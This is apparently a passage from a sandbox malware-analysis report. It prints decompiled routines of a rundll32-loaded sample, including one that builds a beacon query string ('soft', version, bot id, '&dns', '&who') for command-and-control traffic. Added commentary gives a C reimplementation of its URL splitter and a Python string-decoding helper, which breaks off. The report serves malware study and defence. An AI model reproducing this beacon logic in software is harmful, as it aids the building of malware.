                                                  					_t6 =  *0x52dd32c; // 0x73095b0
                                                  					_t1 = _t6 + 0x58; // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t8 =  *_t14;
                                                  				if(_t8 != 0 && _t8 != 0x52dd030) {
                                                  					HeapFree( *0x52dd238, 0, _t8);
                                                  				}
                                                  				_t14[1] = E052D94A9(_v0, _t14);
                                                  				_t11 =  *0x52dd32c; // 0x73095b0
                                                  				_t12 = _t11 + 0x40;
                                                  				__imp__(_t12);
                                                  				return _t12;
			}

Statement addresses: 0x052d75e9, 0x052d75e9, 0x052d75f2, 0x052d7602, 0x052d7602, 0x052d7607, 0x052d760c, 0x00000000, 0x00000000, 0x052d75fc, 0x052d75fc, 0x052d760e, 0x052d7612, 0x052d7624, 0x052d7624, 0x052d7634, 0x052d7637, 0x052d763c, 0x052d7640, 0x052d7646

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(07309570), ref: 052D75F2
                                                  • Sleep.KERNEL32(0000000A,?,052D23DE), ref: 052D75FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,052D23DE), ref: 052D7624
                                                  • RtlLeaveCriticalSection.NTDLL(07309570), ref: 052D7640
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
• Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: c8253ae6f292d683034c0a3ad5a7e6bb53a4fe70d7e817930bf907cfdada0817
                                                  • Instruction ID: 4e3b22b49c4e9e0d93bbb557549c361aa92c79eea610e543858571d856d169be
                                                  • Opcode Fuzzy Hash: c8253ae6f292d683034c0a3ad5a7e6bb53a4fe70d7e817930bf907cfdada0817
                                                  • Instruction Fuzzy Hash: A3F03A70A26541DBD7149B6CE84EF15BFA4EF14352B04C005F846D62C1EA74DC00CE35
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E052DA5D6() {
                                                  				void* _v0;
                                                  				void** _t3;
                                                  				void** _t5;
                                                  				void** _t7;
                                                  				void** _t8;
                                                  				void* _t10;
                                                  
                                                  				_t3 =  *0x52dd32c; // 0x73095b0
                                                  				__imp__( &(_t3[0x10]));
                                                  				while(1) {
                                                  					_t5 =  *0x52dd32c; // 0x73095b0
                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t7 =  *0x52dd32c; // 0x73095b0
                                                  				_t10 =  *_t7;
                                                  				if(_t10 != 0 && _t10 != 0x52de836) {
                                                  					HeapFree( *0x52dd238, 0, _t10);
                                                  					_t7 =  *0x52dd32c; // 0x73095b0
                                                  				}
                                                  				 *_t7 = _v0;
                                                  				_t8 =  &(_t7[0x10]);
                                                  				__imp__(_t8);
                                                  				return _t8;
			}

Statement addresses: 0x052da5d6, 0x052da5df, 0x052da5ef, 0x052da5ef, 0x052da5f4, 0x052da5f9, 0x00000000, 0x00000000, 0x052da5e9, 0x052da5e9, 0x052da5fb, 0x052da600, 0x052da604, 0x052da617, 0x052da61d, 0x052da61d, 0x052da626, 0x052da628, 0x052da62c, 0x052da632

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(07309570), ref: 052DA5DF
                                                  • Sleep.KERNEL32(0000000A,?,052D23DE), ref: 052DA5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,052D23DE), ref: 052DA617
                                                  • RtlLeaveCriticalSection.NTDLL(07309570), ref: 052DA62C
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
• Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: b92206d6a840f0eddfda54b057f2040cbc888840093dde114bbc2ea2dc1ae02c
                                                  • Instruction ID: 2bb7a8154729ad12937acb9f2d26ec632106acc8658ae900de4db15609249400
                                                  • Opcode Fuzzy Hash: b92206d6a840f0eddfda54b057f2040cbc888840093dde114bbc2ea2dc1ae02c
                                                  • Instruction Fuzzy Hash: EEF0B774E26541DBEB189F68E89EF25BFA5AF08361B44C009F806DB290CB30EC00CE35
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E052D7F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                  				intOrPtr* _v8;
                                                  				void* _t17;
                                                  				intOrPtr* _t22;
                                                  				void* _t27;
                                                  				char* _t30;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t39;
                                                  				int _t42;
                                                  
                                                  				_t17 = __eax;
                                                  				_t37 = 0;
                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                  				_t2 = _t17 + 1; // 0x1
                                                  				_t28 = _t2;
                                                  				_t34 = E052D2049(_t2);
                                                  				if(_t34 != 0) {
                                                  					_t30 = E052D2049(_t28);
                                                  					if(_t30 == 0) {
                                                  						E052D9039(_t34);
                                                  					} else {
                                                  						_t39 = _a4;
                                                  						_t22 = E052DA911(_t39);
                                                  						_v8 = _t22;
                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                  							_a4 = _t39;
                                                  						} else {
                                                  							_t26 = _t22 + 2;
                                                  							_a4 = _t22 + 2;
                                                  							_t22 = E052DA911(_t26);
                                                  							_v8 = _t22;
                                                  						}
                                                  						if(_t22 == 0) {
                                                  							__imp__(_t34, _a4);
                                                  							 *_t30 = 0x2f;
                                                  							 *((char*)(_t30 + 1)) = 0;
                                                  						} else {
                                                  							_t42 = _t22 - _a4;
                                                  							memcpy(_t34, _a4, _t42);
                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                  							__imp__(_t30, _v8);
                                                  						}
                                                  						 *_a8 = _t34;
                                                  						_t37 = 1;
                                                  						 *_a12 = _t30;
                                                  					}
                                                  				}
                                                  				return _t37;
			}

Statement addresses: 0x052d7f27, 0x052d7f31, 0x052d7f33, 0x052d7f39, 0x052d7f39, 0x052d7f42, 0x052d7f46, 0x052d7f52, 0x052d7f56, 0x052d7fca, 0x052d7f58, 0x052d7f58, 0x052d7f5c, 0x052d7f63, 0x052d7f66, 0x052d7f80, 0x052d7f6f, 0x052d7f6f, 0x052d7f73, 0x052d7f76, 0x052d7f7b, 0x052d7f7b, 0x052d7f85, 0x052d7fad, 0x052d7fb3, 0x052d7fb6, 0x052d7f87, 0x052d7f89, 0x052d7f91, 0x052d7f9c, 0x052d7fa1, 0x052d7fa1, 0x052d7fbd, 0x052d7fc4, 0x052d7fc5, 0x052d7fc5, 0x052d7f56, 0x052d7fd5

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?,?,00000000), ref: 052D7F33
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                    • Part of subcall function 052DA911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,052D7F61,00000000,00000001,00000001,?,?,052D15A4,?,?,?,?,00000102), ref: 052DA91F
                                                    • Part of subcall function 052DA911: StrChrA.SHLWAPI(?,0000003F,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?,?,00000000,00000000), ref: 052DA929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?), ref: 052D7F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 052D7FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 052D7FAD
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
• Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 1eda429cd267e183bb6f9c03c959941f3f2c708e304774407b2dd8c85652db58
                                                  • Instruction ID: 5bc9529eb963174e4203f4706260bf9690f972b383f9862d36f99b32063da1d8
                                                  • Opcode Fuzzy Hash: 1eda429cd267e183bb6f9c03c959941f3f2c708e304774407b2dd8c85652db58
                                                  • Instruction Fuzzy Hash: C221D272528216EFCB229FA5D888BAEFFE9EF05290F198055F8059B201D779C901C7B0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
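The decompiled routine at 052D7F27 above takes a string, skips a leading "//" scheme separator if the first '/' or '?' is immediately followed by the same byte, and then splits the remainder into two heap buffers: the text before the next '/' or '?' and everything from that delimiter on, with "/" substituted when no delimiter exists. The following C is an added, readable reimplementation of that logic for reference; it is not code from the sample or from the report. The names split_host_path, first_delim and split_matches are assumptions, as is the behaviour of the subcall at 052DA911, which the APIs list shows calling StrChrA for 0x2F ('/') and 0x3F ('?') and is taken here to return the first of the two. The example reserves one extra byte for the path buffer so the default "/" also fits an empty input, whereas the decompiled routine requests lstrlen+1 bytes for both buffers.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed behaviour of the helper at 052DA911 (name assumed for this example):
 * return a pointer to the first '/' or '?' in s, or NULL if neither occurs. */
static const char *first_delim(const char *s)
{
    for (; *s != '\0'; s++) {
        if (*s == '/' || *s == '?')
            return s;
    }
    return NULL;
}

/* Readable equivalent of the routine at 052D7F27 (name assumed).
 * Splits url into a heap-allocated host part and path part:
 *   - if the first delimiter equals the byte after it (the "//" of a scheme),
 *     both bytes are skipped and the search restarts, exactly as the decompiled
 *     code does (it compares *_t22 with *(_t22 + 1) and advances by 2);
 *   - with no delimiter left, the whole remainder is the host and the path is "/";
 *   - otherwise the host is the text before the delimiter and the path is
 *     everything from the delimiter on, so a path may begin with '?'.
 * Returns 1 and sets *host and *path (caller frees both), or 0 on failure. */
int split_host_path(const char *url, char **host, char **path)
{
    size_t len = strlen(url);
    char *h = malloc(len + 1);
    char *p = malloc(len + 2); /* room for "/" even when url is empty */
    if (h == NULL || p == NULL) {
        free(h);
        free(p);
        return 0;
    }

    const char *d = first_delim(url);
    if (d != NULL && d[0] == d[1]) {
        url = d + 2;            /* skip "//" and search again */
        d = first_delim(url);
    }

    if (d == NULL) {
        strcpy(h, url);         /* lstrcpy(_t34, _a4) */
        strcpy(p, "/");         /* *_t30 = 0x2f; _t30[1] = 0 */
    } else {
        size_t n = (size_t)(d - url);
        memcpy(h, url, n);      /* memcpy(_t34, _a4, _t22 - _a4) */
        h[n] = '\0';
        strcpy(p, d);           /* lstrcpy(_t30, _v8) */
    }
    *host = h;
    *path = p;
    return 1;
}

/* Convenience check: 1 if url splits into exactly (exp_host, exp_path). */
int split_matches(const char *url, const char *exp_host, const char *exp_path)
{
    char *h, *p;
    if (!split_host_path(url, &h, &p))
        return 0;
    int ok = strcmp(h, exp_host) == 0 && strcmp(p, exp_path) == 0;
    free(h);
    free(p);
    return ok;
}

int main(void)
{
    /* Constructed sample inputs; these are not strings taken from the sample. */
    const char *inputs[] = {
        "http://example.com/gate.php?id=1",
        "example.com",
        "host.test?x=1",
        "https://a.b//c",
    };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        char *h, *p;
        if (split_host_path(inputs[i], &h, &p)) {
            printf("%-36s host=\"%s\" path=\"%s\"\n", inputs[i], h, p);
            free(h);
            free(p);
        }
    }
    return 0;
}
```

Running it shows the "//" skip and the "/" default; the third input demonstrates that the returned path keeps the '?' delimiter, which matters when reconstructing the request a later routine would issue from these two buffers.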

                                                  C-Code - Quality: 100%
                                                  			E052D7CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                  				void* _v8;
                                                  				void* _t18;
                                                  				int _t25;
                                                  				int _t29;
                                                  				int _t34;
                                                  
                                                  				_t29 = lstrlenW(_a4);
                                                  				_t25 = lstrlenW(_a8);
                                                  				_t18 = E052D2049(_t25 + _t29 + _t25 + _t29 + 2);
                                                  				_v8 = _t18;
                                                  				if(_t18 != 0) {
                                                  					_t34 = _t29 + _t29;
                                                  					memcpy(_t18, _a4, _t34);
                                                  					_t10 = _t25 + 2; // 0x2
                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                  				}
                                                  				return _v8;
			}

Statement addresses: 0x052d7ccd, 0x052d7cd1, 0x052d7cdb, 0x052d7ce2, 0x052d7ce5, 0x052d7ce7, 0x052d7cef, 0x052d7cf4, 0x052d7d02, 0x052d7d07, 0x052d7d11

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,0730937C,?,052D747C,004F0053,0730937C,?,?,?,?,?,?,052D6814), ref: 052D7CC8
                                                  • lstrlenW.KERNEL32(052D747C,?,052D747C,004F0053,0730937C,?,?,?,?,?,?,052D6814), ref: 052D7CCF
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,052D747C,004F0053,0730937C,?,?,?,?,?,?,052D6814), ref: 052D7CEF
                                                  • memcpy.NTDLL(751469A0,052D747C,00000002,00000000,004F0053,751469A0,?,?,052D747C,004F0053,0730937C), ref: 052D7D02
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
• Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: 41717053c9b781fae494f4e25d95ac6ef656d2f64ba92b775dd2f134e8c892ce
                                                  • Instruction ID: ba08173cb40bf25c17e6566b1ef48368590125a88d23d3008bb7c8a37d769519
                                                  • Opcode Fuzzy Hash: 41717053c9b781fae494f4e25d95ac6ef656d2f64ba92b775dd2f134e8c892ce
                                                  • Instruction Fuzzy Hash: B3F03C76A10118BB8B11EFA8CC49CDEBBACEE08294B154062A908E7111E671EA14CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(073087FA,00000000,00000000,74ECC740,052DA453,00000000), ref: 052D3CD8
                                                  • lstrlen.KERNEL32(?), ref: 052D3CE0
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • lstrcpy.KERNEL32(00000000,073087FA), ref: 052D3CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 052D3CFF
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
• Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: da66a753958be934052b323325c4a8ad58ba6bb6ea2f1a974860e9e6660f9c47
                                                  • Instruction ID: a590aa753d35bb517d8dd3d8914ffabde86cc79aa1099ff453a26fa3c5c62b2b
                                                  • Opcode Fuzzy Hash: da66a753958be934052b323325c4a8ad58ba6bb6ea2f1a974860e9e6660f9c47
                                                  • Instruction Fuzzy Hash: 63E06D33916221A787119AE5AC4CC6BBFADEE996227044416F600A3110DB248C01CBF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: fa1bf68d99e4750cea49ed326495732c6756d5db4c93bd9b07b4150935eea351
                                                  • Instruction ID: 9a5d81e1464d0325e4b7ba2a57dd6e3fce6f78f2b1160469d7e890072274994b
                                                  • Opcode Fuzzy Hash: fa1bf68d99e4750cea49ed326495732c6756d5db4c93bd9b07b4150935eea351
                                                  • Instruction Fuzzy Hash: 498129B1A00605AFDB20CF98D884AEEB7F9EF58310F148129E945E7340F774EA85CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 24%
                                                  			E046B8B94(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, unsigned int* _a12, intOrPtr _a16) {
                                                  				intOrPtr _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				void* _v24;
                                                  				intOrPtr _v28;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* _t59;
                                                  				intOrPtr _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t63;
                                                  				intOrPtr _t64;
                                                  				intOrPtr _t68;
                                                  				void* _t71;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t75;
                                                  				intOrPtr _t80;
                                                  				intOrPtr _t84;
                                                  				intOrPtr* _t86;
                                                  				intOrPtr _t92;
                                                  				intOrPtr _t99;
                                                  				unsigned int _t103;
                                                  				signed int _t107;
                                                  				intOrPtr* _t108;
                                                  				intOrPtr* _t110;
                                                  				intOrPtr* _t112;
                                                  				intOrPtr* _t114;
                                                  				intOrPtr _t116;
                                                  				intOrPtr _t121;
                                                  				void* _t125;
                                                  				intOrPtr _t127;
                                                  				intOrPtr* _t128;
                                                  				void* _t129;
                                                  				void* _t138;
                                                  				void* _t139;
                                                  				void* _t140;
                                                  				intOrPtr _t141;
                                                  				intOrPtr _t143;
                                                  				void* _t144;
                                                  				intOrPtr* _t146;
                                                  				void* _t147;
                                                  				intOrPtr* _t148;
                                                  				intOrPtr* _t149;
                                                  				intOrPtr* _t152;
                                                  				void* _t153;
                                                  				void* _t155;
                                                  
                                                  				_t138 = __edx;
                                                  				_t129 = __ecx;
                                                  				_t59 = __eax;
                                                  				_v12 = 8;
                                                  				if(__eax == 0) {
                                                  					__imp__();
                                                  				}
                                                  				_t60 =  *0x46bd018; // 0xf56cfa1f
                                                  				asm("bswap eax"); // each of the four id dwords at 0x46bd00c..0x46bd018 is byte-swapped before it is formatted
                                                  				_t61 =  *0x46bd014; // 0x3a87c8cd
                                                  				_t127 = _a16;
                                                  				_t146 =  *0x46bd120; // 0x74ecc740
                                                  				asm("bswap eax");
                                                  				_t62 =  *0x46bd010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t63 =  *0x46bd00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t64 =  *0x46bd27c; // 0x96a5a8
                                                  				_t3 = _t64 + 0x46be633; // 0x74666f73 = little-endian "soft": the start of a format string
                                                  				// _t146 (import at 0x46bd120) is called as (buffer, format, args...) and its return value is added to the
                                                  				// buffer pointer for the next call, i.e. a wsprintf-style formatter returning the count written. The literals
                                                  				// 3 and 0x3d14b (250187) are the first two fields; the '&'-prefixed fragments below append key=value pairs.
                                                  				_t139 =  *_t146(_t127, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x46bd02c,  *0x46bd004, _t59);
                                                  				_t68 =  *0x46bd27c; // 0x96a5a8
                                                  				_t4 = _t68 + 0x46be673; // 0x74707526 = "&upt": next fragment, written at buffer + count (_t139 + _t127)
                                                  				_t71 =  *_t146(_t139 + _t127, _t4, E046B1C1A());
                                                  				_t155 = _t153 + 0x38;
                                                  				_t140 = _t139 + _t71; // executed
                                                  				_t72 = E046B54BC(_t129); // executed
                                                  				_t128 = __imp__; // 0x75145520
                                                  				_v8 = _t72;
                                                  				if(_t72 != 0) {
                                                  					_t121 =  *0x46bd27c; // 0x96a5a8
                                                  					_t7 = _t121 + 0x46be8eb; // 0x736e6426 = "&dns": appended with the string returned by E046B54BC
                                                  					_t125 =  *_t146(_a16 + _t140, _t7, _t72);
                                                  					_t155 = _t155 + 0xc;
                                                  					_t140 = _t140 + _t125;
                                                  					 *_t128( *0x46bd238, 0, _v8); // (heap handle, 0, ptr): frees that string; HeapFree-like, import name not resolved in the dump
                                                  				}
                                                  				_t73 = E046B7649();
                                                  				_v8 = _t73;
                                                  				if(_t73 != 0) {
                                                  					_t116 =  *0x46bd27c; // 0x96a5a8
                                                  					_t11 = _t116 + 0x46be8f3; // 0x6f687726 = "&who": appended with the string returned by E046B7649
                                                  					 *_t146(_t140 + _a16, _t11, _t73);
                                                  					_t155 = _t155 + 0xc;
                                                  					 *_t128( *0x46bd238, 0, _v8);
                                                  				}
                                                  				_t141 =  *0x46bd32c; // 0x50295b0
                                                  				_t75 = E046B9395(0x46bd00a, _t141 + 4);
                                                  				_t147 = 0;
                                                  				_v20 = _t75;
                                                  				if(_t75 == 0) {
                                                  					L26:
                                                  					 *_t128( *0x46bd238, _t147, _a16); // executed
                                                  					return _v12;
                                                  				} else {
                                                  					__imp__( *0x46bd238, 0, 0x800); // (heap handle, 0, size): a 0x800-byte work buffer, HeapAlloc-like; the (handle, 0, ptr) calls through _t128 at L23..L26 free every buffer on each exit path
                                                  					_v8 = _t75;
                                                  					if(_t75 == 0) {
                                                  						L25:
                                                  						 *_t128( *0x46bd238, _t147, _v20);
                                                  						goto L26;
                                                  					}
                                                  					__imp__();
                                                  					E046B7A80(_t75);
                                                  					_t80 =  *0x46bd32c; // 0x50295b0
                                                  					__imp__(_t80 + 0x40); // acquire the lock at +0x40 of the 0x60-byte structure allocated in E046B225B (EnterCriticalSection-like)
                                                  					asm("lock xadd [eax], ecx"); // atomic add on a shared counter while the lock is held
                                                  					_t84 =  *0x46bd32c; // 0x50295b0
                                                  					__imp__(_t84 + 0x40); // release the same lock (LeaveCriticalSection-like); import names are not resolved in this dump
                                                  					_t86 =  *0x46bd32c; // 0x50295b0
                                                  					_t143 = E046B8307(1, _t138, _a16,  *_t86);
                                                  					_v28 = _t143;
                                                  					asm("lock xadd [eax], ecx");
                                                  					if(_t143 == 0) {
                                                  						L24:
                                                  						 *_t128( *0x46bd238, _t147, _v8);
                                                  						goto L25;
                                                  					}
                                                  					 *0x46bd104(_t143, 0x46bc2ac);
                                                  					_push(_t143);
                                                  					_t92 = E046B3CC8();
                                                  					_v16 = _t92;
                                                  					if(_t92 == 0) {
                                                  						L23:
                                                  						 *_t128( *0x46bd238, _t147, _t143);
                                                  						goto L24;
                                                  					}
                                                  					_t148 = __imp__; // 0x75188170
                                                  					 *_t148(_t143, _a4); // (dst, src) into a freshly allocated buffer: copy
                                                  					 *_t148(_v8, _v20);
                                                  					_t149 = __imp__; // 0x751881d0
                                                  					 *_t149(_v8, _v16); // (dst, src) on the buffer just filled, through a second import: append (lstrcpy/lstrcat-like pair)
                                                  					 *_t149(_v8, _t143);
                                                  					_t99 = E046B809F(0, _v8);
                                                  					_a4 = _t99;
                                                  					if(_t99 == 0) {
                                                  						_v12 = 8;
                                                  						L21:
                                                  						E046BA1B0();
                                                  						L22:
                                                  						 *_t128( *0x46bd238, 0, _v16);
                                                  						_t147 = 0;
                                                  						goto L23;
                                                  					}
                                                  					_t103 = E046B43DF(_t128, 0xffffffffffffffff, _t143,  &_v24); // executed
                                                  					_v12 = _t103;
                                                  					if(_t103 == 0) {
                                                  						_t152 = _v24;
                                                  						_t107 = E046B163F(_t152, _a4, _a8, _a12); // executed
                                                  						_v12 = _t107;
                                                  						_t108 =  *((intOrPtr*)(_t152 + 8));
                                                  						 *((intOrPtr*)( *_t108 + 0x80))(_t108); // method at vtable slot +0x80 of the object stored at +8
                                                  						_t110 =  *((intOrPtr*)(_t152 + 8));
                                                  						 *((intOrPtr*)( *_t110 + 8))(_t110); // vtable slot +8 is IUnknown::Release if these are COM interfaces (consistent with the
                                                  						_t112 =  *((intOrPtr*)(_t152 + 4)); // CoInitializeEx-style check in E046B225B): the objects at +8, +4 and +0 are released in turn
                                                  						 *((intOrPtr*)( *_t112 + 8))(_t112);
                                                  						_t114 =  *_t152;
                                                  						_t103 = E046B9039( *((intOrPtr*)( *_t114 + 8))(_t114), _t152);
                                                  					}
                                                  					if(_v12 != 0x10d2) {
                                                  						L16:
                                                  						if(_v12 == 0) {
                                                  							_t103 = _a8;
                                                  							if(_t103 != 0) {
                                                  								_t144 =  *_t103;
                                                  								_t150 =  *_a12;
                                                  								_push( *_a12);
                                                  								_push(_t144);
                                                  								_push(_t144);
                                                  								L046B8F0A();
                                                  								_t103 = E046B85DB(_t144, _t144, _t150 >> 1);
                                                  								_t143 = _v28;
                                                  								 *_a12 = _t103;
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					} else {
                                                  						if(_a8 != 0) {
                                                  							L19:
                                                  							E046B9039(_t103, _a4);
                                                  							if(_v12 == 0 || _v12 == 0x10d2) {
                                                  								goto L22;
                                                  							} else {
                                                  								goto L21;
                                                  							}
                                                  						}
                                                  						_v12 = _v12 & 0x00000000;
                                                  						goto L16;
                                                  					}
                                                  				}
                                                  			}
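                                                  The decompiler comments on the pointer arithmetic above (// 0x74666f73 and the like) are the little-endian dword stored at the computed address, so the first four bytes of every referenced string can be read straight off the listing, and the four id dwords are run through `bswap eax` before they reach the formatter. The helper below is added here; it is not part of the Joe Sandbox report or of the sample. It pulls the hex comments out of pasted decompiler lines, decodes those that are printable ASCII, and reproduces the byte swap. The sample lines are copied from the listing above; the regex and the function names are my own choices.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample: lines copied from the decompiler listing above. Joe Sandbox prints the
# little-endian dword found at the computed address as a trailing "// 0x..." comment.
SAMPLE_LISTING = """\
_t3 = _t64 + 0x46be633; // 0x74666f73
_t4 = _t68 + 0x46be673; // 0x74707526
_t7 = _t121 + 0x46be8eb; // 0x736e6426
_t11 = _t116 + 0x46be8f3; // 0x6f687726
_t60 =  *0x46bd018; // 0xf56cfa1f
"""

# Assumed comment shape: "// 0x" followed by up to eight hex digits.
HEX_COMMENT = re.compile(r"//\s*0x([0-9a-fA-F]{1,8})\b")


def dword_to_ascii(value: int) -> Optional[str]:
    """Read a 32-bit value as the four bytes it occupies in memory (little-endian).
    Return them as text only if every byte is printable ASCII, otherwise None."""
    raw = value.to_bytes(4, "little")
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def bswap32(value: int) -> int:
    """Mirror the x86 `bswap eax` the function applies to each id dword before
    formatting it: reverse the byte order of a 32-bit value."""
    return int.from_bytes(value.to_bytes(4, "little"), "big")


def decode_listing(text: str) -> List[Tuple[int, Optional[str]]]:
    """(dword, ascii_or_None) for every hex comment in pasted decompiler output,
    in listing order."""
    result = []
    for match in HEX_COMMENT.finditer(text):
        value = int(match.group(1), 16)
        result.append((value, dword_to_ascii(value)))
    return result


def string_fragments(text: str) -> List[str]:
    """Only the comments that decode to printable text: the first four bytes of
    each string the code references, in the order the code references them."""
    return [s for _, s in decode_listing(text) if s is not None]


if __name__ == "__main__":
    for value, text in decode_listing(SAMPLE_LISTING):
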